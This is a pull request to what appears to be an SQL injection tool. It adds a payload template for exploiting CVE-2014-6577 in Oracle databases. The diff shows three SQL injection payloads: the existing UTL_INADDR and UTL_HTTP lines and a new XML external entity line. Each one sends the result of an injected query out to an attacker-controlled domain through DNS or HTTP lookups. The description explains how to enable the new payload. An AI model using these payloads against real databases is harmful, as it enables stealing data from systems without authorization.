### PR TITLE
Add cradle to leverage CVE-2014-6577 for Oracle DNS data exfiltration

### DIFF
--- a/data/procs/oracle/dns_request.sql
+++ b/data/procs/oracle/dns_request.sql
@@ -1,2 +1,3 @@
 SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
 # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual 


### PR DESCRIPTION
This PR adds a new cradle to  support  CVE-2014-6577 for OOB DNS data exfiltration.  To use it uncomment the respective line in the dns_request.sql in the "data/procs/oracle/" folder